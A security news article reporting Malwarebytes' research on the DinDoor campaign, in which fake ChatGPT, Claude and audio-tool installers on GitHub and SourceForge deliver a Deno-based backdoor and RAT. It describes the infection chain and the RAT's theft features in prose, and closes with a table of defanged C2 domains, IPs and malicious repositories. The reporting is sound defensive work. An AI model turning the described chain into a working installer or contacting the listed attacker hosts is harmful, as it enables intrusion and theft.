A new malware campaign is targeting content creators, gamers, and AI enthusiasts by disguising itself as popular software tools like ChatGPT and Claude.
The attackers are spreading a dangerous backdoor called DinDoor through fake installers hosted on trusted platforms, catching many users completely off guard.
The campaign has gained significant traction, partly because it uses compromised YouTube channels to push traffic toward the malicious files.
Videos on these channels have already accumulated more than 50,000 views, making this a far-reaching threat that extends well beyond a small handful of victims.
Researchers at Malwarebytes identified the campaign after spotting suspicious fake installers and plugins on GitHub and SourceForge.
The researchers noted that the malware impersonates well-known software brands including ChatGPT, Claude, Ableton Live, AutoTune, and Kontakt, making the deception particularly convincing for users who trust these names.
The attackers rely heavily on the credibility of legitimate platforms to make their fake projects look real.
Since GitHub and SourceForge are trusted by millions of developers and everyday users, victims are far less likely to question the authenticity of what they are downloading.
Malwarebytes said in a report shared with Cyber Security News (CSN) that once installed, DinDoor acts as a backdoor that connects to a command-and-control server and delivers a fully capable remote access Trojan, or RAT.
This RAT can steal data from browsers and crypto wallets, capture screenshots, record clipboard activity, and even spy on victims through a hidden video stream using the Microsoft Edge browser as cover.
How the DinDoor Backdoor Infects Victims
The infection begins when a user visits a malicious GitHub or SourceForge repository and copies a command into their terminal, believing they are installing legitimate software.
That single command silently downloads an MSI installer file and runs it using Windows’ built-in installer tool, kicking off the entire chain. The MSI file then drops a CMD file and a PowerShell script onto the victim’s machine.
The PowerShell script installs the Deno JavaScript runtime using standard Windows package managers called Scoop and WinGet, which makes the activity appear far less suspicious to security tools. Once Deno is in place, it fetches and runs the DinDoor backdoor directly from the attacker’s server.
DinDoor then establishes persistence by creating a Windows registry run key, ensuring the malware restarts every time the machine boots up.
The backdoor quietly communicates with the C2 server, pulling down additional payloads and sending back information about the compromised system.
The same backdoor was also distributed through SourceForge pages mimicking a game booster called GearUP and an AI watermark remover called BWR, showing that the attackers are not limiting themselves to AI chatbot lures alone.
The Deno RAT and Its Hidden Capabilities
The RAT delivered through DinDoor is built on the same Deno JavaScript runtime and carries an extensive set of spying and data theft tools.
It targets over 50 crypto wallet browser extensions and software wallets including Atomic Wallet, Exodus, and Electrum, posing a direct financial risk to anyone in the crypto space.
One of its most unusual features is a peer-to-peer video streaming mode that hijacks the Microsoft Edge browser.
The RAT silently launches a hidden Edge process, injects a small web page into it, and uses that page to stream live video of the victim’s screen directly to the attacker without routing it through any central server, which makes it much harder to detect.
The RAT also supports SOCKS5 proxy tunnels, full remote desktop control via a custom VNC setup, and can execute commands using PowerShell.
A lighter version of the RAT called “agent-lite” was also found, which routes its communications through Cloudflare Workers for even greater anonymity.
Users are strongly advised to download software only from official vendor websites and to be cautious of free or cracked versions of paid tools.
Before running any downloaded file, checking its publisher and digital signature using Windows Properties is a simple but effective first step in spotting something suspicious.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| URL | https[:]//github.com/claude-free-plugin/ | Malicious GitHub repository distributing fake Claude installer |
| URL | https[:]//github.com/ai-gen-profi | Malicious GitHub repository for fake AI software |
| URL | https[:]//github.com/wharfdemolisherpit | Malicious GitHub repository for fake software |
| URL | https[:]//sourceforge.net/projects/gearup/ | Fake GearUP game booster on SourceForge |
| URL | https[:]//sourceforge.net/projects/bluewaveremover/ | Fake BWR AI watermark remover on SourceForge |
| Domain | claudescript[.]top | Distribution website for DinDoor malware |
| Domain | ms-telemetry-gateway-us[.]com | Command-and-Control (C2) server |
| Domain | dakatawebstick[.]com | Command-and-Control (C2) server |
| Domain | ashpaltlonpro[.]com | Command-and-Control (C2) server |
| Domain | cf-proxy[.]cloud-analytics-services[.]workers.dev | Cloudflare-based C2 server |
| Domain | agilemast3r[.]duckdns[.]org | Command-and-Control (C2) server |
| Domain | geralnewlong[.]com | Command-and-Control (C2) server |
| Domain | hngfbgfbfb[.]cyou | Command-and-Control (C2) server |
| Domain | logicalnewrestore[.]com | Command-and-Control (C2) server |
| IP Address | 23[.]227[.]196[.]107 | Command-and-Control (C2) server |
| IP Address | 45[.]137[.]99[.]121 | Command-and-Control (C2) server |
| IP Address | 31[.]57[.]129[.]23 | Command-and-Control (C2) server |
| IP Address | 66[.]78[.]40[.]107 | Command-and-Control (C2) server |
| IP Address | 193[.]233[.]198[.]132 | Command-and-Control (C2) server |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
